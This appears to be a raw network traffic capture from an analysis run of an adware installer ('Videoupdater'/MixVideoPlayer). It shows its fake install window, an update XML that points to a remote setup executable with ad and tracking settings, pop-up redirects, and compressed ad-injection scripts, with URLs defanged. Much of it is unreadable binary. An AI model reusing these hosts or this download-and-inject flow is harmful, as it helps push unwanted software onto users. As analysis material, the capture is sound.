Last-Modified: Wed, 04 Mar 2015 10:45:22 GMT

Server: nginx

Content-Length: 19034

Connection: keep-alive
/* Template Template Videoupdater */...article,aside,details,figcaptio
n,figure,.footer,header,hgroup,menu,nav,section {..display:block;.}.p,
 h5, h4, h3, h2, h1, span, ul, li, form, input, textarea {..margin:0;.
.padding:0;.}.body {..margin:0 auto;..background-color:#323333;..width
: 555px;..height: 458px;..color:#b5b5b5;..font-family:Arial, Helvetica
, sans-serif;..scrollbar-face-color: #666666;..scrollbar-highlight-col
or: #999999;..scrollbar-3dlight-color: #333333;..scrollbar-shadow-colo
r: #333333;..scrollbar-darkshadow-color: #333333;..scrollbar-arrow-col
or: #CCCCCC;..scrollbar-track-color: #333333;.}...videupdater a, .vide
updater span {..color:#b5b5b5;.}...clear {..clear:both;..height:0px;..
overflow:inherit;..display: none;.}..li {..list-style: none;.}./******
***************//*********************//*********************//*******
**************//********./* estilo para poner los botones del box.html
 todos en display none */.._Bnext, .._Bexit, .._Bdecline, .._Bomit {..
/*display:none;*/.}./*************************************************
*/..container {..float:left;..width:555px;..height: 458px;..background
-color:#323333;..margin: 0 auto;.}../*****************Template Win_Lin
k*****************/......minimize {..float: right;..width: 45px;..posi
tion: relative;..margin-right: -45px;..right: 45px;..margin-top: 12px;
..z-index: 9999;.}....minimize ul li {..display: inline;..float: left;
.}...minimize li {....float: left;..}  ....minimize .button-min {..col
or: #636363;..text-decoration: none;..border: none;..font-size: 17
<<< skipped >>>

GET /__maxpower__/render_screen/2014/11/8b9c3fb4-73d0-11e4-925e-06a3579b0dab/screen_variation=videoUpdater HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Language: en

Content-Type: text/html; charset=utf-8

Date: Sun, 28 Jun 2015 05:46:23 GMT

Server: nginx

Vary: Accept-Language

Content-Length: 961

Connection: keep-alive
..<!--Intall Videoupdater-->..<div class="install">..    &
lt;h1>Installation Progress</h1>.    .    <p>This Downl
oad Manager will minimize to your system tray shortly to allow you to 
work on other items while your selections install. To restore this win
dow, simply click on the icon in your system tray.</p>.    .    
  <div class="install-loading">.    </div>.    <div cla
ss="progress-bar">.        <div class="_TotalProgressLevel progr
ess-level" ></div>            .    </div>....<div cl
ass="clear" style="height:10px; display:block;"></div>.     &
lt;div class="_ProgressInstallingText" style="display:none; text-align
: center; margin-left: 45px; width: 422px;"><p>Installing ...
</p></div>.    .    <div class="_ProgressText" style="d
isplay:none;  margin-left: 33px;">.        <p>Process: <sp
an class="_ProgressTextDownloaded"></span>  of <span 
class="_ProgressTextTotal"></span> (<span class="_Progress
TextPercentage"></span> %)</p>.    </div>..   .  
 .</div>.HTTP/1.1 200 OK..Accept-Ranges: bytes..Content-Language
: en..Content-Type: text/html; charset=utf-8..Date: Sun, 28 Jun 2015 0
5:46:23 GMT..Server: nginx..Vary: Accept-Language..Content-Length: 961
..Connection: keep-alive....<!--Intall Videoupdater-->..<div 
class="install">..    <h1>Installation Progress</h1>.  
  .    <p>This Download Manager will minimize to your system
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loading-install.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/gif

Date: Sun, 28 Jun 2015 05:46:26 GMT

ETag: "54f07a03-1ef8"

Last-Modified: Fri, 27 Feb 2015 14:06:59 GMT

Server: nginx

Content-Length: 7928

Connection: keep-alive
GIF89a..........DCD...:::.........qqq............555...zzziii}}}......
.........aaaQQQeee...%%%.........VVV...lll...............,,,...YYY...)
))...uuuJJJNNN!"!...]]]...101.................................\[\.....
....#$#KLK.../0/KKK[\[`_`...GGG'''...???............///......ccc...sss
ddd```...###.........SSS...777...VVV...888...xxx...............{|{{{{g
hg............kmk444XXX......OOOWWW...222...333!..NETSCAPE2.0.....!..X
MP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" x
mpMM:InstanceID="xmp.iid:C7B15D6E6C0511E4901AB7B77D879212" xmpMM:Docum
entID="xmp.did:C7B15D6F6C0511E4901AB7B77D879212"> <xmpMM:Derived
From stRef:instanceID="xmp.iid:C7B15D6C6C0511E4901AB7B77D879212" stRef
:documentID="xmp.did:C7B15D6D6C0511E4901AB7B77D879212"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>................................................................
..................................................................~}|{
zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;
:9876543210/.-, *)('&%$#"! .................................!.....
<<< skipped >>>

GET /sdb/1d/MixVideoPlayerUpdate.xml?5ac7d5d9-ec86-4754-9f48-546c2a60c63f HTTP/1.1

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 28 Jun 2015 05:47:20 GMT

Content-Type: text/xml

Content-Length: 671

Last-Modified: Thu, 25 Jun 2015 08:28:34 GMT

Connection: keep-alive

ETag: "558bbbb2-29f"

Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..<LastVersion>...&l
t;url>hXXp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup
.exe</url>...<version>1.0.0.22</version>...<Track
Activity>true</TrackActivity>...<TrackErrors>true</T
rackErrors>...<vast active="true">....<adnum>3</adnu
m>....<adurl countries="US,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,J
P,CA,IR,AU,NL,ID,CO,PK">.....<![CDATA[hXXp://ads.adaptv.advertis
ing.com/a/h/fUUYX443fr3iHLf1b0DAy3MvZmqN m4YhR8Ql84ugxaUwnVer0nkAl4RaF
w4ippAh4iKfLnbLyk=?cb=[CACHE_BREAKER]&pageUrl=apps://mixvideop
layer.com&eov=eov]]>....</adurl>...</vast>...<Coll
ectorLTV>collector-pre.ltv-analytics.com:8080</CollectorLTV>.
.</LastVersion>HTTP/1.1 200 OK..Server: nginx..Date: Sun, 28 Jun
 2015 05:47:20 GMT..Content-Type: text/xml..Content-Length: 671..Last-
Modified: Thu, 25 Jun 2015 08:28:34 GMT..Connection: keep-alive..ETag:
 "558bbbb2-29f"..Accept-Ranges: bytes..<?xml version="1.0" encoding
="UTF-8"?>..<LastVersion>...<url>hXXp://staticrr.mixvid
eoplayer.com/sdb/84/MixVideoPlayerSetup.exe</url>...<version&
gt;1.0.0.22</version>...<TrackActivity>true</TrackActiv
ity>...<TrackErrors>true</TrackErrors>...<vast activ
e="true">....<adnum>3</adnum>....<adurl countries="U
S,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,JP,CA,IR,AU,NL,ID,CO,PK">....
.<![CDATA[hXXp://ads.adaptv.advertising.com/a/h/fUUYX443fr3iHLf
<<< skipped >>>

GET /?s1=&s2=&s3= HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 3p6.popularfastchannel.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Date: Sun, 28 Jun 2015 05:46:34 GMT

Location: hXXp://8MDzz.exclusiverewards.7015.info/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68

Server: nginx/1.2.8

X-Powered-By: PHP/5.3.23

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Date: Sun, 28
 Jun 2015 05:46:34 GMT..Location: hXXp://8MDzz.exclusiverewards.7015.i
nfo/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r1
0845-t68..Server: nginx/1.2.8..X-Powered-By: PHP/5.3.23..Content-Lengt
h: 0..Connection: keep-alive..

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Range: bytes=14365-

Unless-Modified-Since: Fri, 27 Feb 2015 14:07:01 GMT

If-Range: "54f07a05-12d72"

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Range: bytes 14365-77169/77170

Content-Type: image/gif

Date: Sun, 28 Jun 2015 05:46:27 GMT

ETag: "54f07a05-12d72"

Last-Modified: Fri, 27 Feb 2015 14:07:01 GMT

Server: nginx

Content-Length: 62805

Connection: keep-alive
..bJ....J.. t...-....-00k.......v2.........z.....A........Z,$...$&...m
...J.....k...J......... .....,.". ......... 0.!`[email protected]..
...C"....pq....G..,.....\..&/ C......2....}.03.0..r"8.........9.!4%D..
0...l..?."q.C7.1....5%Zh.q*.'...L.A.......r.a@'.......!D.scRw......}S.
w.y.MA........P.....9.~..7./..E...........9|...r..x.=....qW^..u......M
....n5.V0...<....rLa|".c,. u.Lx*/......q... .I..O<.D..@b..&h.E..
.@....`..h.O...'b....].......w. `..`.....D....X9.@P... .....R..&8C....
...y....J.... ~ T.......N..X_....?X..6......A.....A.:...E....A....=X..
J....x9EPL.XD. ..8*P..u...!...A..j....p..%...K...P.3N..D|..!`.....z...
. HJ...w.."..4H..bS.."...5>n....$' ..K.....c...8..r.V..*...KR......
L.GG..|[.......A....b. A..L`....4.0..1.....4....Q....e4............i.&
lt;....@.. ..v..........0.....e"..O P.......:...A.d..6.....S...@D.)M.]
....(&...n..kw... .......@),....b..2.)$2..<........9.ab..4...R.LEL.
...)P..N.PB...X.D...3.....*..:U3.A................R........ ]Kz...u.{.
&H.*..v".&E. .Y........V.z...1...j[..4.f....jWY.Y}.......... .!.A...(A
.? ..W..&X...,.....pu`VH.3.w.-p.1\[email protected].{...B..un_..]..a
..P.].p.Dl7.r].suPQL...20.|.K..B..0..~.........mz.L.N. .....p.l..z..:.
...L........J..Z...`.......N.....D.z......`..v...:*..7......D.X...2..P
.A...@[email protected]!..)Sy.V62...e.O.......`.2 ..J`C;).e..9.g.g.......
.z..=.l.)k .{v2..........C.!..)/...x.....-`..*.A.]...C".3....@... .B^.
}....... ...5 ...W.?...A....:..m..5..F_.W.t...u..f...t8b'vm..8[.......
eL.Z...6.a nro../..%.}^7 .. x..7l^U.....7.Y.os.z...u.s.j.P...F...N
<<< skipped >>>

GET /sdb/1d/MixVideoPlayerUpdate.xml?2b955ad6-c3ec-4307-9af7-0cf289b4016b HTTP/1.1

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 28 Jun 2015 05:47:08 GMT

Content-Type: text/xml

Content-Length: 671

Last-Modified: Thu, 25 Jun 2015 08:28:34 GMT

Connection: keep-alive

ETag: "558bbbb2-29f"

Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..<LastVersion>...&l
t;url>hXXp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup
.exe</url>...<version>1.0.0.22</version>...<Track
Activity>true</TrackActivity>...<TrackErrors>true</T
rackErrors>...<vast active="true">....<adnum>3</adnu
m>....<adurl countries="US,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,J
P,CA,IR,AU,NL,ID,CO,PK">.....<![CDATA[hXXp://ads.adaptv.advertis
ing.com/a/h/fUUYX443fr3iHLf1b0DAy3MvZmqN m4YhR8Ql84ugxaUwnVer0nkAl4RaF
w4ippAh4iKfLnbLyk=?cb=[CACHE_BREAKER]&pageUrl=apps://mixvideop
layer.com&eov=eov]]>....</adurl>...</vast>...<Coll
ectorLTV>collector-pre.ltv-analytics.com:8080</CollectorLTV>.
.</LastVersion>HTTP/1.1 200 OK..Server: nginx..Date: Sun, 28 Jun
 2015 05:47:08 GMT..Content-Type: text/xml..Content-Length: 671..Last-
Modified: Thu, 25 Jun 2015 08:28:34 GMT..Connection: keep-alive..ETag:
 "558bbbb2-29f"..Accept-Ranges: bytes..<?xml version="1.0" encoding
="UTF-8"?>..<LastVersion>...<url>hXXp://staticrr.mixvid
eoplayer.com/sdb/84/MixVideoPlayerSetup.exe</url>...<version&
gt;1.0.0.22</version>...<TrackActivity>true</TrackActiv
ity>...<TrackErrors>true</TrackErrors>...<vast activ
e="true">....<adnum>3</adnum>....<adurl countries="U
S,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,JP,CA,IR,AU,NL,ID,CO,PK">....
.<![CDATA[hXXp://ads.adaptv.advertising.com/a/h/fUUYX443fr3iHLf
<<< skipped >>>

GET /ajax/libs/jquery/1.10.2/jquery.min.js HTTP/1.1

Accept: */*

Referer: hXXp://8mdzz.exclusiverewards.7015.info/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ajax.googleapis.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/javascript; charset=UTF-8

Last-Modified: Tue, 09 Jul 2013 11:31:25 GMT

Date: Fri, 26 Jun 2015 10:03:39 GMT

Expires: Sat, 25 Jun 2016 10:03:39 GMT

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 32822

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 157377

Alternate-Protocol: 80:quic,p=0
.............{...0.{....U.sD.N...3.u.4i.8....h?..J.A..@-....;.lX(.....
.i-b..z.ls....._.......d4.....G.28z2......S..e..VQ...8.:[.......Q^\...
2.......}T..b...m.Iv....HUn.d.M.....?..]....XT..uT.e......q.>.D..Q.
/...nV.r...J.227/....P..)vp.H,..^l.|!....yb%..e.A.......J\.E.....J.U|.
.Z....._W..@\..UT~...*.m\Tw.B.G.r#nes$E\...(.o.nG..*L*|#.`/n..|x.....|
..|T...!.....z..up:...o.......x&O......../_..>./.u.......a..c......
...Y0.{.x\....'..A..T..r_..7........./.O.'g5.~A.-Dx.?/....ky.E..a-.n.|
.`..B..q.......: .E.................U.z..X.8.....*vq...2..]..'<%..S
r).C.N6....F.......x.........i...,*c...7.\p.G.h.zq...MRVq..u..y.....BH
...|.M.*.........*.............4..6..w...X.&....}....>....A.......$
.q.q.#..B.s.W.....^.Q.J...*..c(.U.J.J..S.Ty;..y....=o.p-`...X.*/.[...:
s.[..n".i...q...*)..W....S..&..'...g..X<..1L.w.x..?........7g....AF
@...........T....$....8S..du..x43.n.`..=..C.......w.s......(.RQ.......
x.f......}..n.QQ._.....Rd..Q...70.Y6.o`.. ....#1...x?.......oGI.*.....
_.e.].....:p......}lv.,....3..QEU...z2uVd...../c.8...z..?Y."?>.q...
;.7.=.%[email protected]~........q..\...u......LW.....ac>.`V
..........W.W[..K.h0.W..7...iQDw>..[\..z....cQ.T,tv....h..)5.......
.......Vr....p|.........x./.....\.|....c%][email protected].^..j/[email protected]
/....;...|/h..F..%..M.H..y...%p.D.{..:c.._...H......ME..N..:TA.....H..
.......3..:[email protected]...........
lup..J.u......P..(...~..W.[Z.....0|.C1....X.....v...HDC....2rz.`..5pl)
l..}.g{)..)bB."..8.,A)ao/e..l. {../.A;..u.q.A].%....,e.....NN.`.;K
<<< skipped >>>

GET /BesH3gE9/pop-up/ HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Language: en

Content-Type: text/html

Date: Sun, 28 Jun 2015 05:46:27 GMT

Server: nginx

Set-Cookie: lpsl_BesH3gE9=0121abcf76b77eb1868131149b1a9bf2 1435556787; Path=/; Expires=Mon, 29-Jun-15 05:46:27 GMT;Domain=VVV.magnofiler.com

Vary: Accept-Language

Content-Length: 1071

Connection: keep-alive
...........Vko.6..._...$'.h.q...dI..h.bu..if.....D....E.{/%....V.0`...
.>.......~=...k4Si..............&.f|.>.2.}.\....f2V1.hB...0.3...
!...Y..........\.\/m....*.#. ...&......~...m..G...|..d .\!.....{RdN...
.H...$.......d.I.g...3.x...r..`4....T..S\...p. ...).....v.....Gq......
3.i.....N......O...".v........I..i..i;..f...4..Y..m..E.H..HQ....'.%.FD
..S.J.....;..;).c..2.T0..]......A...)..T..>.....<S,S....QP..y.I5
[email protected]...{.1G.9-...N..o..Ww.....'......j.8....<.}S
.'..e. D.E.`..%..N)<[,.N....&.hH..0. B...g.9([email protected]'J8.V..
..<... ...<..Y'!......^}.....t.........,E.....)>..Y.......t..
.....y.....@.|XSm.x..X..Q0.Mt.."..6....I..V&..K...$E.C.`.|.<wcS3.].
:..q.....Y;{4PL.c..|7v.d..#..2.`c.>........Kg.Q...........oU.<gb
...w.....:.Y...[....i:..14M...w....#......G............o....K.....Y...
#[..q...NY......Q....Q r[...u;-<4Js`H..D.l.x. 1.R..a..r..z..N.5.qY.
.....jZ......8x..-...r*h*.......W..]q~..4..:....AA.x..]/..z90.....,.K"
g|9.. .u_ ........6.n8.^.VVTd...V..\;zBWSc.s.. ..w.....#.f..J...w...@H
K...fEV$I.i<....P).....Dx6..w'.2 .V.).W.KK.*_]...F.W..B.y...HTTP/1.
1 200 OK..Content-Encoding: gzip..Content-Language: en..Content-Type: 
text/html..Date: Sun, 28 Jun 2015 05:46:27 GMT..Server: nginx..Set-Coo
kie: lpsl_BesH3gE9=0121abcf76b77eb1868131149b1a9bf2 1435556787; Path=/
; Expires=Mon, 29-Jun-15 05:46:27 GMT;Domain=VVV.magnofiler.com..Vary:
 Accept-Language..Content-Length: 1071..Connection: keep-alive........
.....Vko.6..._...$'.h.q...dI..h.bu..if.....D....E.{/%....V.0`....&
<<< skipped >>>

GET /lpresources/js/linkv2.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.magnofiler.com

Connection: Keep-Alive

Cookie: lpsl_BesH3gE9=0121abcf76b77eb1868131149b1a9bf2 1435556787

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Encoding: gzip

Content-Type: application/javascript

Date: Sun, 28 Jun 2015 05:46:27 GMT

ETag: "280056-d84-4feef24b01140"

Last-Modified: Thu, 24 Jul 2014 11:56:13 GMT

Server: nginx

Vary: Accept-Encoding

Content-Length: 1358

Connection: keep-alive
...........WYo.8.~..`.ELV.|...q. M.........AIT,D...r....;$E.Ns 0,..|sr
f.Ty$."G.4..L...[&.T........B;.Q^......}..a...?.c.&h6.N..P...\.... 5.S
..9......5.)..R..xQ.1Vb.......V.A........>:[email protected])..:.[....w4....
.Q.e..".\..!)..h.^......;..M......n....P.>....^ zBQ...Y.kq^e...L0..
"...c...R..7Y..Jd..1pc....BO82.......l.r&"Z.....B!y..Z......i...?....9
..5..gED.. .|T.=Qf.....\.V..O..C../x....M..l..z.."W.B.a..rh..,...'.?..
.?.L...c.N......5.A.."...u*..........?\..2W..q.......h..mb`Y.1...k..i.
w.8K.;.3.,e.e......2T..FtS..K......7"..,*e.&.e.W.%v......=.L.....\.'.{
......D9.U...s.-... ..JD..U.0pHqwV..;8Y5A....G.........T/.?~.w..A.aI..
.\i.}P.@k%<.G.7......%u2..0.....3.(.H%.......P?1x:n...=.:...m...v2.
.w.....Go..tj.(-7.K. =Y.4.>.........7.(.w.q ... i..Lt/.....W.....T.
..)..W.."Y...`..%..,...........tW..8.C.A2.,8(...j..../.B...x.S..u..X..
..f..=..U8......vLc. [email protected]' E..A3.....t......-.yhZ)..6.`....o%....
.....'.Y...u...c..&....... .Q.9.....Vm.mW...h..W...C.w............'...
r.(.t).j......L...9.j.Uc...QBa9 ..3gPJ.WJ.]xj..!M.<....U......_....
.K!0...Ea..F...J=..`.6R.a..V..,cj . ..W..h.i........T....T_.l[.....i.u
..VL.u.AE..CR..n...l......y..}...1..5.................O...`'.MW8c...|.
. x...{.t..........}_...^..&...?[..9Y|...g.-..._.....h.G~.....i1...b..
...&.:.j..9.g.]B]..}..K>......{.7.aNqtMWD.6.0g.......0..z...PghuR7.
.}..f.y./.p-.%T.n.......xN.j.[.Q......h}e.........
<<< skipped >>>

GET /lpresources/js/ainj.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.magnofiler.com

Connection: Keep-Alive

Cookie: lpsl_BesH3gE9=0121abcf76b77eb1868131149b1a9bf2 1435556787

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Encoding: gzip

Content-Type: application/javascript

Date: Sun, 28 Jun 2015 05:46:27 GMT

ETag: "185921-0-4f9c38966d780"

Last-Modified: Mon, 19 May 2014 16:48:46 GMT

Server: nginx

Vary: Accept-Encoding

Content-Length: 20

Connection: keep-alive
....................HTTP/1.1 200 OK..Accept-Ranges: bytes..Content-Enc
oding: gzip..Content-Type: application/javascript..Date: Sun, 28 Jun 2
015 05:46:27 GMT..ETag: "185921-0-4f9c38966d780"..Last-Modified: Mon, 
19 May 2014 16:48:46 GMT..Server: nginx..Vary: Accept-Encoding..Conten
t-Length: 20..Connection: keep-alive..........................


GET /lpresources/js/dlStoragev1.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.magnofiler.com

Connection: Keep-Alive

Cookie: lpsl_BesH3gE9=0121abcf76b77eb1868131149b1a9bf2 1435556787

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Encoding: gzip

Content-Type: application/javascript

Date: Sun, 28 Jun 2015 05:46:28 GMT

ETag: "180b8a-1a57-50572ea11d0c0"

Last-Modified: Wed, 15 Oct 2014 09:39:55 GMT

Server: nginx

Vary: Accept-Encoding

Content-Length: 2010

Connection: keep-alive
...........X[o...~v~...H:q..X,...]d..]t/i.A..b.P.(.F.]..c....!.....p..
.....\...K.Y..P.......b..c.........\3 J..2o-e.*!.....Ur....S>..(..^
....Z ...i..Z...Z.^.(b.}&.....O.$.:.:.....c{D........K.,.....WH.{C..}.
...2 n..Q..~[$p.1..C/<8.....EZ:_..'..@/.#...ud,K.T....J....i|....3=
.....N.!.nY@g....~...~j..i..jj..m.D;l.94.h.$A..9..n.Vp?.X.O..&...."...
....mch....'L..[m...m...XfR......G9(.....BVq....\....G..1....V[.......
......%....H<[email protected]@....[.. .fZ8Ie...Z..%Zdy
[email protected].~-..X?[O.Y.i{.K: L.....D......-......... .k.......r.6..
... v.5X..l.O..F...9..-.O.....5^.L.i..<Ip..O.....~...,...>.2/...
H.R .v..2....R*}:....X.......p2i..b..^.......tW.y...).'....H.......E.)
.Bx].......p.....9.c]...V....w..(. $D..uc..\.&OFv.2.>%.yf..!B.V4.).
..~k..db...Z.......}.....&..^...{cGzV.V...yv:..^....vQ..`[email protected].
.......h*[email protected]{h./.HpF.).T......i.......3u.'...fK..j.OY.
;!3 .N.'Fw1.....7..W..}"..n.ax[,y.%.. .......X%wf. .O...s...'...g7..9'
y.V..y.\O..3...,.-....H.q..........AM..;..L.8B`.3.......X.J.0..m....)1
..b-.w...j.!..oi...f..R'......-U]8.y. 0.*....0J..M...@.&.}............
..IR<...G.J.)I...G.......l.....I.sU....I..}{8...."HQ.....- #.......
...Q.TL.%"^.h=..cX.r.7.{,......o#,.Ho...*.i...A..*...........2..mh{Ws.
3.3.:..N.-...C#WV.[..I.c.J..`...{8....Dw.....x.................../.E_C
l7?....C<....a..Qg.V.p.....\.=.......w?.9.qno..%o....'..z..s(..)...
...p.v...}kw..*a.T.1...5.S.K]*......58....B..O$M.C.`.............a.h.q
...0... jV.....C. IS.].......8_.l..h.....mP.6j....b.1...~.e...DV..
<<< skipped >>>

GET /mh/53a811d55f1c1e744b000002/2307c835-660a-4bd8-a3df-031d9af89e85/53a811d55f1c1e744b000002/default/media/js/jquery-1.11.1.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.magnofiler.com

Connection: Keep-Alive

Cookie: lpsl_BesH3gE9=0121abcf76b77eb1868131149b1a9bf2 1435556787

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/javascript

Date: Sun, 28 Jun 2015 05:46:28 GMT

ETag: "53a84f60-1762a"

Last-Modified: Mon, 23 Jun 2014 16:01:36 GMT

Server: nginx

Content-Length: 95786

Connection: keep-alive
/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.o
rg/license */.!function(a,b){"object"==typeof module&&"object"==typeof
 module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.do
cument)throw new Error("jQuery requires a window with a document");ret
urn b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){v
ar c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=
h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(
a,b)},n=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,o=/^-ms-/,p=/-([\da-z])/g
i,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,c
onstructor:m,selector:"",length:0,toArray:function(){return d.call(thi
s)},get:function(a){return null!=a?0>a?this[a this.length]:this[a]:
d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a
);return b.prevObject=this,b.context=this.context,b},each:function(a,b
){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map
(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return t
his.pushStack(d.apply(this,arguments))},first:function(){return this.e
q(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.le
ngth,c= a (0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]
:[])},end:function(){return this.prevObject||this.constructor(null)},p
ush:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var
 a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boole
an"==typeof g&&(j=g,g=arguments[h]||{},h  ),"object"==typeof g||m.
<<< skipped >>>

GET /click/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=Mjd8NTc4fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|07032691-1d59-11e5-9d25-f8bc125381b8 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: network.adsmarket.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx/1.6.2

Date: Sun, 28 Jun 2015 05:46:32 GMT

